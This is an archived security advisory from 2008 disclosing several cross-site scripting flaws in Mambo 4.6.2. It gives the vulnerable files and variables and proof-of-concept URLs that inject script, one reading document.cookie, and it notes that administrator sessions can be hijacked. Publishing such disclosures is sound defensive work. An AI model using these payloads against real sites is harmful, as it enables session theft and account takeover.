Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:20373
HistoryAug 18, 2008 - 12:00 a.m.

Mambo 4.6.2 Full Version - Multiple Cross Site Scripting - By Khashayar Fereidani

2008-08-1800:00:00
vulners.com
36
JSON

Script : Mambo 4.6.2 Full & Older Versions

Type : Multiple Cross Site Scripting Vulnerabilities

Alert Level : Medium

Download From : http://surfnet.dl.sourceforge.net/sourceforge/mambo/MamboV4.6.2.zip

Discovered by : Khashayar Fereidani

My Website : HTTP://FEREIDANI.IR

Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t ] com

Cross Site Scripting Vulnerability 1 :

Vulnerable File : administrator/popups/index3pop.php

Vulnerable Line (5) : <title><?php echo $mosConfig_sitename; ?> - Administration [Mambo]</title>

Vulnerable Variable : mosConfig_sitename

For Example :
http://Example/administrator/popups/index3pop.php?mosConfig_sitename=&lt;/title&gt;&lt;script&gt;alert&#40;document.cookie&#41;&lt;/script&gt;

Attacker can hijack administrator cookie and session and login with they

Cross Site Scripting Vulnerability 2 :

Vulnerable File : mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?

Vulnable Variable : Any Variable - You can set any variable …

For Example set (hacker) variable :
http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?khashayar=&lt;script&gt;alert&#40;&#39;xss&#39;&#41;&lt;/script&gt;

you can set cross site scripting code in variable name :
http://Example/mambots/editors/mostlyce/jscripts/tiny_mce/filemanager/connectors/php/connector.php?&lt;script&gt;alert&#40;&#39;xss&#39;&#41;&lt;/script&gt;=Hello+Word

                    Tnx : God

   HTTP://IRCRASH.COM       HTTP://FEREIDANI.IR
JSON